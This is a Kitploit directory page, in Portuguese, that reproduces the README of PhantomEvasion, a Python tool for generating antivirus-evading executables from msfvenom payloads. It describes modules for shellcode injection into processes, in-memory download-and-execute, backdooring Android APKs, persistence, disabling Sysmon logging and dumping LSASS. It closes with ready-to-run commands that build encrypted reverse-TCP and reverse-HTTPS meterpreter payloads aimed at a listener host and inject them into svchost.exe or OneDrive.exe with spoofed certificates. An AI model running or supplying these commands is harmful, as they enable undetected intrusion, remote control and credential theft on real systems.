Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PhantomEvasion — Ferramenta de evasão de antivírus baseada em Python que gera executáveis indetectáveis a partir de payloads do msfvenom com técnicas avançadas como injeção de junkcode, criptografia, falsificação de certificados e múltiplos métodos de execução. | Kitploit
Ferramentas/GitHubGitHub/esskumar/phantomevasion
Escalada de PrivilégiosFrameworks de ExploraçãoGeração de PayloadsMecanismos de PersistênciaShellcodePós-ExploraçãoTestes de PenetraçãoRed Teaming
GitHubesskumar/phantomevasion

PhantomEvasion

Ferramenta de evasão de antivírus baseada em Python que gera executáveis indetectáveis a partir de payloads do msfvenom com técnicas avançadas como injeção de junkcode, criptografia, falsificação de certificados e múltiplos métodos de execução.

171há 6 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

PHANTOM EVASION 3.0

Phantom-Evasion é uma ferramenta de evasão antivírus escrita em python (compatível tanto com python quanto com python3) capaz de gerar executáveis (quase) totalmente indetectáveis, mesmo com os payloads x86 msfvenom mais comuns.

Os seguintes sistemas operacionais suportam oficialmente a configuração automática:

  1. Kali Linux
  2. Parrot Security

Os seguintes sistemas operacionais provavelmente suportam a configuração automática, mas exigem instalação manual do metasploit-framework:

  1. OSX (testado no Catalina)
  2. Ubuntu
  3. Linux Mint
  4. Elementary
  5. Deepin
  6. outras distribuições Debian
  7. Centos
  8. Fedora
  9. Blackarch

Os seguintes sistemas operacionais exigem configuração manual:

  1. Windows 10

Simplesmente faça git clone ou baixe e descompacte a pasta Phantom-Evasion

Configuração:

Configuração automática, abra um terminal e execute:

root@kitploit:~
python3 phantom-evasion.py --setup

ou:

root@kitploit:~
chmod +x ./phantom-evasion.py

./phantom-evasion.py --setup

ou inicie o phantom-evasion no modo interativo e selecione a opção 7

Dependências (apenas para configuração manual)

  1. metasploit-framework
  2. mingw-w64 (cygwin no windows)
  3. gcc-multilib
  4. apktool
  5. apksigner
  6. strip
  7. osslsigncode

CMDLINE/INTERATIVO:

  1. Inicie o phantom-evasion no modo interativo:
root@kitploit:~
python3 phantom-evasion.py

ou:

root@kitploit:~
./phantom-evasion.py
  1. Caso contrário, para ver as opções do modo cmdline:
root@kitploit:~
python3 phantom-evasion.py --help

ou:

root@kitploit:~
./phantom-evasion.py --help

MÓDULOS WINDOWS

  • Cada módulo C de payload Windows pode ser compilado (suporta tanto x86 quanto x64) como EXE ou DLL/ReflectiveDLL.

  • Injeção aleatória de junkcode (intensidade, frequência e probabilidade de reinjeção podem ser definidas) e técnicas de evasão de antivírus do Windows (frequência pode ser definida).

  • Criptografia de shellcode/arquivo Multibyte Xor/Vigenere suportada nos módulos de injeção de shellcode e Download Exec.

  • Suporta técnica Ntdll unhookapi e masquerading de processo Peb.

  • Ampla gama de modos de execução suportados (local e remoto).

  • Ampla gama de modos de alocação de memória de payload (Virtual_RWX, Virtual_RW/RX, Virtual_RW/RWX, Heap_RWX).

  • O carregamento dinâmico de APIs do Windows pode ser definido.

  • Spoofer e assinante de certificado suportados.

  • Strip executável (https://en.wikipedia.org/wiki/Strip_(Unix))

Injeção de Shellcode C do Windows

Payloads Windows do msfvenom e shellcode personalizado suportados. O shellcode pode ser armazenado como recurso e recuperado em tempo de execução com a API FindResource.

Criptografia de shellcode suportada:

root@kitploit:~
1. nenhum
2. Multibyte-Xor
3. Double-key Multibyte-Xor
4. Vigenere
5. Double-key Vigenere
  1. O método de execução local pode ser um dos seguintes:

    Thread

    APC

    O modo de alocação de memória local pode ser um dos seguintes:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RWX

  2. O método de execução remota pode ser um dos seguintes:

    ThreadExecutionHijack (abreviado como TEH)

    Processinject (abreviado como PI)

    APCSpray (abreviado como APCS)

    EarlyBird (abreviado como EB)

    EntryPointHijack (abreviado como EPH)

    O modo de alocação de memória remota pode ser um dos seguintes:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

Stager meterpreter C puro do Windows (C)

Módulos stager meterpreter C puro (TCP/HTTP/HTTPS) compatíveis com msfconsole e cobalt strike beacon. (reverse_tcp/reverse_http/reverse_https)

Usando o modo cmdline:

root@kitploit:~
reverse_tcp c stager é WRT

reverse_http c stager é WRH

reverse_https c stager é WRS
  1. O método de execução local pode ser um dos seguintes:

    Thread

    APC

    O modo de alocação de memória local pode ser um dos seguintes:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RWX

Download-Exec C do Windows Sem Escrita em Disco

Baixar exe/dll da url fornecida na memória e executar/carregar em um processo remoto (sem escrever no disco).

Download de EXE/DLL criptografados suportados:

root@kitploit:~
1. nenhum
                                 
2. Multibyte-Xor
                                 
3. Double-key Multibyte-Xor
                               
4. Vigenere
                                
5. Double-key Vigenere

A DLL/EXE criptografada será salva como nomeoriginal + "crypt" + ".dll" ou ".exe" – este é o que deve ser baixado

  1. Windows DownloadExecExe NoDiskWrite (WDE usando modo cmdline):

    O método de execução remota pode ser um dos seguintes:

    ProcessHollowing (abreviado como PH)

  2. Windows DownloadExecDll NoDiskWrite (WDD usando modo cmdline):

    O método de carregamento remoto pode ser um dos seguintes:

    ReflectiveDll (abreviado como RD)

    RDAPC (ReflectiveDllAPC)

    ManualMap (abreviado como MM) ---> apenas x86

PAYLOADS LINUX

Módulo de Injeção de Shellcode Linux (C)

Payloads Linux do msfvenom e shellcodes personalizados suportados.

PAYLOADS ANDROID

  1. Android Msfvenom Obfuscate Backdoor:

    Ofuscar payloads msfvenom e reconstruir (smali/baksmali) com apktool. O payload ofuscado pode ser usado para backdoor em arquivos apk benignos.

Módulos de PERSISTÊNCIA

  1. Windows Persistence RegCreateKeyExW Add Registry Key (C) O executável compilado precisa ser enviado para a máquina alvo e executado especificando o caminho completo do arquivo a ser adicionado à inicialização como argumento.

  2. Windows Persistence REG Add Registry Key (CMD) Este módulo gera payloads de linha de comando de persistência (Adicionar chave de registro via REG.exe).

  3. Windows Persistence Keep Process Alive (C) O executável compilado precisa ser enviado para a máquina alvo e executado. Usa CreateToolSnapshoot, ProcessFirst e ProcessNext para verificar se o processo especificado está ativo a cada X segundos (se não, cria um novo processo usando a API WinExec).

  4. Windows Persistence Schtasks (CMD)

    Este módulo gera payloads de linha de comando de persistência (usando Schtasks.exe).

  5. Windows Persistence Create Service (CMD)

    Este módulo gera payloads de linha de comando de persistência (usando sc.exe).

Módulos de ELEVAÇÃO DE PRIVILÉGIOS

  1. Windows DuplicateTokenEx (C)

    Cria um novo processo com um token clonado de outro processo. O executável compilado precisa ser enviado para a máquina alvo e executado.

Módulos de PÓS-EXPLORAÇÃO

  1. Windows Unload Sysmon (C) Descarrega o driver sysmon, fazendo com que o sistema pare de registrar logs de eventos do sysmon. O executável compilado precisa ser enviado para a máquina alvo e executado.

  2. Windows Unload Sysmon (CMD) Descarrega o driver sysmon, fazendo com que o sistema pare de registrar logs de eventos do sysmon.

  3. Windows Attrib hide file (CMD) Usa attrib para ocultar arquivo

  4. Windows SetFileAttribute hidden (C) Oculta arquivo usando a API SetFileAttribute O executável compilado precisa ser enviado para a máquina alvo e executado.

  5. Windows DumpLsass (C) Despeja Lsass usando a API MiniWriteDumpWrite. O executável compilado precisa ser enviado para a máquina alvo e executado.

  6. Windows DumpLsass (CMD)

    Despeja Lsass a partir da linha de comando.

Exemplos do modo cmdline do Phantom-Evasion:

  1. injeção de shellcode windows, saída de exe assinado com certificado https falsificado, método de execução local: Thread, mem: Virtual_RWX, criptografia: vigenere
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/meterpreter/reverse_tcp -H 192.168.1.123 -P 4444 -i Thread -e 4 -mem Virtual_RWX -j 1 -J 15 -jr 0 -E 5 -c www.windows.com:443 -f exe -o filename.exe
  1. injeção de shellcode windows x64, saída como dll reflexiva, método de execução remota: ProcessInject (PI), mem: Virtual_RW/RX, processo alvo: SkypeApp.exe, criptografia: xor de chave dupla
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp SkypeApp.exe -i PI -e 3 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -R -o filename.dll
  1. injeção de shellcode windows x64, saída como dll com strip, shellcode armazenado como recurso, método de execução remota: EarlyBird (EB), mem: Virtual_RW/RX, processo alvo: svchost.exe, criptografia: xor
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp svchost.exe -i EB -e 2 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -res -S -o filename.dll
  1. stager windows x64 reverse https, saída como dll com strip, método de execução local: Thread, mem: Heap_RWX
root@kitploit:~
python3 phantom-evasion.py -m WRS -a x64 -H 192.168.1.123 -P 4444 -i Thread -mem Heap_RWX -j 1 -J 15 -jr 0 -E 5 -f dll -S -o filename.dll
  1. windows x86 downloadexec dll, saída como exe com strip, método de execução remota: ManualMap (MM), processo alvo: OneDrive.exe, tamanho do download 1000000 bytes
root@kitploit:~
python3 phantom-evasion.py -m WDD -U http://192.168.1.123/payload.dll -i MM -tp OneDrive.exe -ds 1000000  -j 10 -J 10 -jr 0 -E 10 -f exe -S -o filename.exe

  1. windows x64 downloadexec exe, saída como dll reflexiva com strip, método de execução remota: ProcessHollowing (PH), processo alvo: svchost.exe, tamanho do download 1000000 bytes
root@kitploit:~
python3 phantom-evasion.py -m WDE -U http://192.168.1.123/payloadcrypt.exe -e 4 -ef payload.exe -i PH -tp svchost.exe -ds 1000000  -j 1 -J 5 -jr 0 -E 3 -f dll -R -S -o filename.dll

Licença

GPLv3.0

Créditos e recursos úteis

https://github.com/stephenfewer/ReflectiveDLLInjection

https://github.com/rsmudge/metasploit-loader

https://ired.team

https://github.com/theevilbit/injection

http://www.rohitab.com/discuss/topic/40761-manual-dll-injection/

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://wikileaks.org/ciav7p1/cms/files/BypassAVDynamics.pdf

Baixar ferramenta